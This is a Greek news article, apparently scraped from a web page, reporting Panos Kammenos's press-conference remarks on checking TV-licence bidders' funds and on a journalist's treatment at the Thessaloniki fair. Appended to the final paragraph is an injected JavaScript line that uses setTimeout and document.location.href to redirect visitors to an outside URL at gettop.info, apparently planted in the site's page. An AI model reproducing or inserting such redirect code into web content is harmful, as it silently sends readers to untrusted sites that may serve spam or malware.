Καμμένος για πόθεν έσχες: Εκείνοι που θα αντέξουν, θα αντέξουν BINTEO

0
4

 

 

Θέση σχετικά με τον διαγωνισμό για τις τηλεοπτικές άδειες και τον έλεγχο των πόθεν έσχες πήρε ο πρόεδρος των ΑΝΕΛ Πάνος Καμμένος κατά τη διάρκεια της συνέντευξης τύπου στη ΔΕΘ.

Απαντώντας στο ερώτημα αν είναι επαρκής ο έλεγχος των πόθεν έσχες των τεσσάρων υπερθεματιστών και αν έχει ελεγχθεί αναλυτικά στο σύνολο του ποσού που πρέπει να καταβάλλουν για τη χορήγηση των αδειών από τη στιγμή που έχει εκφράσει συγκεκριμένες αμφιβολίες για το που θα βρει τα χρήματα συγκεκριμένος υπερθεματιστής ο κ. Καμμένος είπε: «Το πόθεν έσχες έχει και το πόθεν και το έσχες. Εχουμε ένα μέρος των χρημάτων τα οποία πληρώνονται τώρα και για τα οποία γίνεται έλεγχος, αλλά υπάρχει και το άλλο μέρος των χρημάτων που θα ελεγχθεί την κατάλληλη ώρα. Οταν κάποιος πάτησε ένα κουμπί και είπε εγώ προσφέρω 61 εκατ. θα πρέπει να αποδείξει ότι εκείνη τη στιγμή είχε τα 61 εκ.».

Παράλληλα πρόσθεσε: «Είναι μία διαδικασία η οποία συνεχίζεται. Εγώ πιστεύω ότι θα γίνει ο έλεγχος όπως πρέπει να γίνει, μιλάμε για πολλά χρήματα, μιλάμε για εκατομμύρια τα οποία θα έχουν προέλευση θα μπουν από λογαριασμό σε κάποιον λογαριασμό. Αν κάποιος είπε ότι εγώ έχω ένα διαμέρισμα το οποίο θα το εκποιήσω, πρέπει να το εκποιήσει κιόλας για να πληρώσει τα λεφτά. Είναι λοιπόν μία διαδικασία η οποία θα προχωρήσει και εκείνοι που θα αντέξουν, θα αντέξουν και εκείνοι που δεν θα αντέξουν, δεν θα αντέξουν. Νομίζω ότι και ο Alpha είχε μία πολύ καλή δημόσια πρόταση η οποία ακούστηκε από επιχειρηματία τον κ. Σαββίδη».

Στην επισήμανση ότι ο κ. Σαββίδης δεν έχει πάρει άδεια ο πρόεδρος των ΑΝΕΛ ανέφερε: «Η πρόταση την οποία έκανε, την έκανε δημόσια και χωρίς να έχει ακόμα άδεια. Αυτό σημαίνει πολλά πράγματα».

Επίσης, ο κ. Καμμένος έκανε ιδιαίτερη αναφορά και στα όσα συνέβησαν με τη δημοσιογράφο του Alpha Ευαγγελία Τσικρίκα με την ερώτηση της στον πρωθυπουργό στη ΔΕΘ.

«Θέλω να πω κάτι γιατί δεν σας κρύβω ότι στεναχωρήθηκα με αυτό που έγινε προχθές με τη συνάδελφό σας την οποία γνωρίζω πολύ καλά από το κοινοβούλιο. Είμαστε μαζί 24 χρόνια», είπε ο κ. Καμμένος και συμπλήρωσε: «Δεν υπάρχει κανείς και ιδίως κανείς πολιτικός πιστεύω, ο οποίος να θέλει να δει κάποιον δημοσιογράφο, γιατί συνεργάτες μας είστε, μπορεί καμία φορά να μας χτυπάτε, αλλά πάντα δεν μας χτυπάτε μόνοι σας».

Μάλιστα προφανώς για να δείξει την καλή σχέση που έχει με τους εκπροσώπους του Τύπου και ότι τους «στηρίζει», «απήλλαξε» από τα καθήκοντά της την εκπρόσωπο Τύπου του κόμματος Μανταλένα Παπαδοπούλου και ανέβασε ως συντονιστή των ερωτήσεων δημοσιογράφο από το πάνελ των δημοσιογράφων και συγκεκριμένα τον Νίκο Οικονόμου από την εφημερίδα «Δημοκρατία».

Ο κ. Καμμένος του ζήτησε να κάνει πρώτος ερώτηση καθώς όπως είπε: «Την επόμενη μισή ώρα να συντονίσετε εσείς και να δίνετε εσείς τον λόγο στους συναδέλφους σας δημοσιογράφους για να μην υπάρχει κανένα παράπονο και να μην μπορεί κανείς να πει ότι αποκλείσαμε κάποιον δημοσιογράφο». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here